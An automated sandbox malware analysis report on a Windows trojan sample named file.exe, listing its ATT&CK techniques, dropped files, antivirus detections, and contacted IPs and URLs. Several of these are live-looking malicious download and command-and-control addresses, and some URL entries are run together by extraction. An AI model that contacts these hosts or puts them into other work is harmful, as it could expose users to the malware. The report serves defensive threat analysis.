                  Source: Yara matchFile source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 12 Process Injection | 11 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 12 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 123 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Timestomp | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Behavior Graph ID: 715158
Sample: file.exe
Start date: 03/10/2022
Architecture: WINDOWS
Score: 88

Signatures shown in the graph:

• Malicious sample detected (through community Yara rule)
• Antivirus detection for URL or domain
• Multi AV Scanner detection for dropped file
• 4 other signatures

Process tree with network contacts and dropped files:

file.exe (started)
  Network: 208.67.104.97, ports 49693, 49698, 80 (GRAYSON-COLLIN-COMMUNICATIONSUS, United States)
  Network: 85.31.46.167, ports 49694, 80 (CLOUDCOMPUTINGDE, Germany)
  Network: 2 other IPs or domains
  Dropped: C:\Users\user\AppData\Local\...\Cleaner.exe (PE32)
  Dropped: C:\Users\user\...\Bunifu_UI_v1.5.3.dll (PE32)
  Dropped: C:\Users\user\AppData\Local\...\dll[1] (PE32)
  Dropped: C:\Users\user\AppData\Local\...\soft[1] (PE32)
  cmd.exe (started)
    Cleaner.exe (started)
      Network: iplogger.org, 148.251.234.83, ports 443, 49701 (HETZNER-ASDE, Germany)
      Signature: Multi AV Scanner detection for dropped file
      Signature: May check the online IP address of the machine
    conhost.exe (started)
  WerFault.exe (started)
    Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
  WerFault.exe (started)
    Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
  9 other processes (started)
    Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode), three instances
    Dropped: 5 other malicious files
    conhost.exe (started)
    taskkill.exe (started)

Source | Detection | Scanner | Label
--- | --- | --- | ---
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
--- | --- | --- | ---
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1] | 29% | ReversingLabs | Win32.Trojan.Lazy
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1] | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1] | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe | 29% | ReversingLabs | Win32.Trojan.Lazy

Source | Detection | Scanner | Label
--- | --- | --- | ---
0.0.file.exe.400000.21.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.31.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.7.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.19.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.23.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.13.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.25.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.9.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.17.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.11.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.15.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.29.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.27.unpack | 100% | Avira | HEUR/AGEN.1250671
0.0.file.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1250671
                  No Antivirus matches
Source | Detection | Scanner | Label
--- | --- | --- | ---
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte | 100% | URL Reputation | malware
http://www.sajatypeworks.com- | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cn | 0% | URL Reputation | safe
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ho | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.como2 | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/ho | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0ho | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/.T | 0% | URL Reputation | safe
http://www.typography.net | 0% | URL Reputation | safe
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte | 100% | URL Reputation | malware
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://107.182.129.235/storage/ping.php | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn.TTF | 0% | Avira URL Cloud | safe
http://www.fontbureau.com( | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/.TTC | 0% | URL Reputation | safe
http://www.sajatypeworks.comtr | 0% | Avira URL Cloud | safe
http://107.182.129.235/storage/extension.php | 0% | URL Reputation | safe
http://85.31.46.167/software.php | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/F | 0% | URL Reputation | safe
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst | 100% | URL Reputation | malware
https://iplogger.orgx | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://g-cleanit.hk | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.sajatypeworks.comcom | 0% | URL Reputation | safe
http://171.22.30.106/library.php | 100% | URL Reputation | malware
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | 0% | Avira URL Cloud | safe
http://www.sakkal.comI | 0% | Avira URL Cloud | safe
http://www.fontbureau.comH_ | 0% | Avira URL Cloud | safe
http://www.tiro.comq | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.comd: | 0% | Avira URL Cloud | safe
http://www.typography.netad | 0% | Avira URL Cloud | safe
http://www.monotype.9 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
iplogger.org | 148.251.234.83 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte | true | URL Reputation: malware | unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte | true | URL Reputation: malware | unknown
http://107.182.129.235/storage/ping.php | false | URL Reputation: safe | unknown
http://107.182.129.235/storage/extension.php | false | URL Reputation: safe | unknown
http://85.31.46.167/software.php | true | URL Reputation: safe | unknown
https://iplogger.org/1Pz8p7 | false | | high
http://171.22.30.106/library.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
http://www.jiyu-kobo.co.jp/ho | Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com- | Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.como2 | Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cn | Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ho | Cleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | Cleaner.exe, 00000016.00000002.563291404.000001CFC91C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Cleaner.exe, 00000016.00000003.439359814.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0ho | Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/.T | Cleaner.exe, 00000016.00000003.434593062.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn.TTF | Cleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com( | Cleaner.exe, 00000016.00000003.437840133.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.typography.net | Cleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.comtr | Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Cleaner.exe, 00000016.00000003.430026733.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | Cleaner.exe, 00000016.00000003.436737283.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436633622.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436859788.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437363653.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437170500.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437117752.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437064705.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437229886.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Cleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Cleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersp | Cleaner.exe, 00000016.00000003.439268166.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439104249.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439219729.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439012764.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.438961213.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439161982.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designerso | Cleaner.exe, 00000016.00000003.447075330.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/.TTC | Cleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comH_ | Cleaner.exe, 00000016.00000003.436987400.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.sakkal.comI | Cleaner.exe, 00000016.00000003.435071712.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                          http://www.tiro.comqCleaner.exe, 00000016.00000003.431705459.000001CFE1B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/FCleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substfile.exe, 00000000.00000000.352480046.000000000019B000.00000004.00000010.00020000.00000000.sdmptrue
                                          • URL Reputation: malware
                                          unknown
                                          http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.orgCleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sajatypeworks.comd:Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://iplogger.orgxCleaner.exe, 00000016.00000002.565404043.000001CFC95CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.carterandcone.comlCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cn/Cleaner.exe, 00000016.00000003.431228141.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431179686.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430147464.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNCleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://iplogger.orgCleaner.exe, 00000016.00000002.565434475.000001CFC95D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cnCleaner.exe, 00000016.00000003.430687491.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430933717.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430753328.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431021568.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlCleaner.exe, 00000016.00000003.438267437.000001CFE1B50000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.typography.netadCleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://g-cleanit.hkfile.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/Cleaner.exe, 00000016.00000003.434754929.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434991979.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sajatypeworks.comcomCleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.monotype.9Cleaner.exe, 00000016.00000003.444449589.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.444320811.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
IP              | Domain       | Country       | ASN   | ASN Name                        | Malicious
148.251.234.83  | iplogger.org | Germany       | 24940 | HETZNER-ASDE                    | false
208.67.104.97   | unknown      | United States | 20042 | GRAYSON-COLLIN-COMMUNICATIONSUS | true
85.31.46.167    | unknown      | Germany       | 43659 | CLOUDCOMPUTINGDE                | true
107.182.129.235 | unknown      | Reserved      | 11070 | META-ASUS                       | false
171.22.30.106   | unknown      | Germany       | 33657 | CMCSUS                          | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 715158
Start date and time: 2022-10-03 17:28:33 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: file.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.winEXE@21/51@1/5
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Execution Graph export aborted for target Cleaner.exe, PID 5208 because it is empty
• Not all processes were analyzed; the report is missing behavior information
